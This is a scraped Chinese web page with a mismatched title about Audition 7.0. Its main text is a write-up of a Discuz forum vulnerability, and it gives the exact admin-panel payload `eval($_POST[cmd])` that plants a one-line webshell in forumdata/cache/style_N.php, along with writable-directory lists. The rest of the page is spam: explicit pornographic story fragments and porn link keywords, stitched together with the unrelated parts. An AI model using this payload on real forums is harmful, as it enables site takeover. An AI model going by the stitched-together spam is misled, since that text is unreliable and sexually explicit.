求教会AU的电脑高手。为什么我更新了7.0版本后一进…

来源:蜘蛛抓取(WebSpider) 时间:2011-05-29 00:35 标签: au7.0.1
我很少关心之类的漏洞,已经很少拿站了,遇到DZ更加只是路过,也没去过多关心DZ的漏洞或者去研究代码;前不久论坛被人留下一个shell,害我检查半天,不过既然遇到了,那就公布出来方便大家。我先声明:1.这个不是我首发,很多牛牛很早之前就发现了,但没人公布,ring04h牛那貌似有个:,估计知道的人很多了,我研究的少,知道迟了,惭愧惭愧;2.我从拿到shell的IIS日志知道这里可以利用,即styles.inc.php这个文件,于是看了下,找到利用办法。后来经flyh4t提醒,居然与ring04h的那个方法一样,我落后了...好了,不废话,看代码:
&?php......if($newcvar&&&&$newcsubst)&{&&&&&&&&&&&&if($db-&result_first("SELECT&COUNT(*)&FROM&{$tablepre}stylevars&WHERE&variable='$newcvar'&AND&styleid='$id'"))&{&&&&&&&&&&&&&&&&cpmsg('styles_edit_variable_duplicate',&'',&'error');&&&&&&&&&&&&}&elseif(!preg_match("/[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*/",&$newcvar))&{&&&&&&&&&&&&&&&&cpmsg('styles_edit_variable_illegal',&'',&'error');&&&&&&&&&&&&}&&&&&&&&&&&&$newcvar&=&strtolower($newcvar);&&&&&&&&&&&&$db-&query("INSERT&INTO&{$tablepre}stylevars&(styleid,&variable,&substitute)&&&&&&&&&&&&&&&&VALUES&('$id',&'$newcvar',&'$newcsubst')");&&&&&&&&}//插入变量数据,From&......updatecache('styles');//更新缓存(写文件),From&......?&
这是为某一style风格增加变量的代码,把变量名与变量的值存入数据库,虽然post过来的数据daddslashes了,但入库之后又都是纯净的数据了。这里涉及到一个正则问题,判断变量名的:!preg_match("/[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*/", $newcvar),其中“\x7f-\xff”是指ASCII码值在127~255之间的字符,它们经常作为中文字符的首字节出现,所以可以利用其作为中文匹配的标志。于是这个匹配貌似只是允许字母或者中文做变量名,没其他高深的匹配,随便测试了下,一般情况下这个正则等于虚设:
&?php&&&&$newcvar=$_GET['newcvar'];&&&&echo&$newcvar;&&&&echo&"&br&";&&&&if(!preg_match("/[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*/",&$newcvar))&{&&&&&&&&&&&&&&&&echo&"haha";&&&&&&&&&&&&}else{&&&&&&&&&&&&&&&&echo&'pass';&&&&&&&&&&&&}&&&&?&
下面看看updatecache这个函数,在include里的cache.func.php文件里,先从数据库取出来,经过一段处理最终写入文件,具体我不描述了,我只谈谈重点,看一段函数:
function&getcachevars($data,&$type&=&'VAR')&{&&&&$evaluate&=&'';&&&&foreach($data&as&$key&=&&$val)&{&&&&&&&&if(is_array($val))&{&&&&&&&&&&&&$evaluate&.=&"\$$key&=&".arrayeval($val).";\n";&&&&&&&&}&else&{&&&&&&&&&&&&$val&=&addcslashes($val,&'\'\\');&&&&&&&&&&&&$evaluate&.=&$type&==&'VAR'&?&"\$$key&=&'$val';\n"&:&"define('".strtoupper($key)."',&'$val');\n";&&&&&&&&}&&&&}&&&&return&$}
啥也不说了,处理了value没处理key,而这个key就是之前我们提交的,干净的存在数据库里的值。关于数组的key,大家可以参考下幻影旅团第三期《》,那篇文章好多地方谈到key的问题,dz这里却忽视了...于是可以直接拿shell了,利用方法(论坛地址改成自己的),先用管理员帐号登陆后台,无需论坛创始人,管理员等级即可:/bbs/admincp.php?action=styles&operation=edit&id=1&adv=1中,最下面有个“自定义模板变量”,变量中填:OLDJUN', '#999');eval($_POST[cmd]);//替换内容随便输入:1111,然后提交,一句话木马就产生了:/bbs/forumdata/cache/style_1.php如果你修改的style的id是2的话,对于的shell就是style_2.php。这个风格模板可以导入导出的,于是有了ring04h的那个dzshell,嫌麻烦可以直接用那个导入风格获取shell。注:很多人反应连不上一句话,我发现我文章少说了一句:$evaluate .= $type == 'VAR' ? "\$$key = '$val';\n" : "define('".strtoupper($key)."', '$val');\n";这句话是说所有的变量名换成大写的了!因此请用大写的CMD做为你一句话的密码!附dz可写目录:o附件目录 默认是 ./attachments o数据目录 ./forumdata o缓存目录 ./forumdata/cache o数据目录 ./forumdata/templateso主题缓存目录 ./forumdata/threadcacheso缓存目录 ./forumdata/logs o缓存目录 ./uc_client/data/cache o缓存目录 ./uc_server/datao缓存目录 ./uc_server/data/cache o缓存目录 ./uc_server/data/viewo缓存目录 ./uc_server/data/avatar o缓存目录 ./uc_server/data/logs o缓存目录 ./uc_server/data/backup o缓存目录 ./uc_server/data/tmp
共有83条评论www。淫女,欧美成人一级片,酸,又浓又厚又多的阳精就“卜卜”地射进阿
酸,又浓又厚又多的阳精就“卜卜”地射进阿宾妈妈的嘴里了。
雅莉的双手使劲抱住老色狼的身躯,酥胸顶在他的胸口www。淫女,难耐地磨着。 &&&&
就…就是这…这样…’ 欧美成人一级片&&&&
伯文实在无地自容。&&&&
又过了好一会儿,才听见房门锁扭松“的儿”的一声,却不拉开,钟小姐迟疑了一下,转了转门把,咦?是开了啊!这佳蓉在搞什么玩意儿小手手不要抖?&&&&
“她哪里有人家刘亦菲漂亮!”苏元春继续羞辱地忍受着他的色手的侵袭,居然在她的臀沟里肆无忌惮地骚扰,她已经春心难捺,娇躯轻轻颤抖,幽谷开始湿润泥泞起来,说话声音都有点发颤,“不过,这个机会可是难得!还要拜托子建兄弟多多关照哦!麻烦兄弟在巧巧妹妹那里帮着多说几句好话!”&&&&
让你来陪我一下,你看我,说着就想哭,没有一点意思了。”姣嫂脸上又露出了笑容,说:“阿&&&&
厕所门底下约十公分未封闭,从乔枫站立的位置可以看到李婷穿着高跟鞋的脚尖。一阵“淅呖淅呖”的声音,女人尿尿的声音传来,立刻想象着那微张的**喷出尿液的淫糜样子,乔枫的**更加涨起。看来紧张的工作让李婷憋了许久,尿液又急又长,近一分钟之久才停歇,接着是冲水和拉穿裙子的声音。&&&&
白洁忽然感觉到了李明那种贪婪火热的目光,抬头不满的扫了李明一眼,心里很厌恶这个猥琐卑鄙的男人,动了动自己坐的姿势,扭过脸去。&&&&
阿吉和眼镜仔一前一后,忙着去干阿宾的妈妈。阿宾的妈妈趴跪在床上白羊一样的娇躯,荡漾着成熟妩媚的美韵,呈现出视觉无上的享受。眼镜仔定力肤浅,忍性不够,突然狼哮起来,腰间狂酸,又浓又厚又多的阳精就“卜卜”地射进阿宾妈妈的嘴里了。&&&&摩托车维修常识
阿德严词地说,雅莉害怕地问:「证。。什N证明t」 &&&&
杀更大说真的,这段时间,白洁也是很想找高义的,这次出门习近乎放荡的几天,已经快把白洁这个新婚少妇的矜持弄没了,今天高义一摸自己的&&&&
那老板更高明的功力在此时完全发挥,他不去触动姑姑的私处,却抓著她两团屁股让拇指反复地压下放松,这样一来姑姑的穴儿就像会说话一样的张张合合,这真是绝招,他让姑姑由自己的身体小手手不要抖产生快意,她早不知今夕何夕了,全身只剩下**儿还活著,她就是想要,要有人来满足她。老板知道准备就续,进攻的号角可以吹响了。他也不急功近利,沉著的将右手拇指一挪,按在姑姑的肛门上,在花蕾的皱褶上轻轻的画圆,从头到尾不曾出声的姑姑终于忍耐不住,“嗯……哼……”的吐出娇柔的音。&&&&
友情链接:you丿izz观看,新金平瓶梅国语全集
万能影视ios版,辣椒种子发芽的快,宠小娇妻全文阅读。  面对如此冷
友情链接:

我要回帖

更多关于 au7.0.1 的文章

 

随机推荐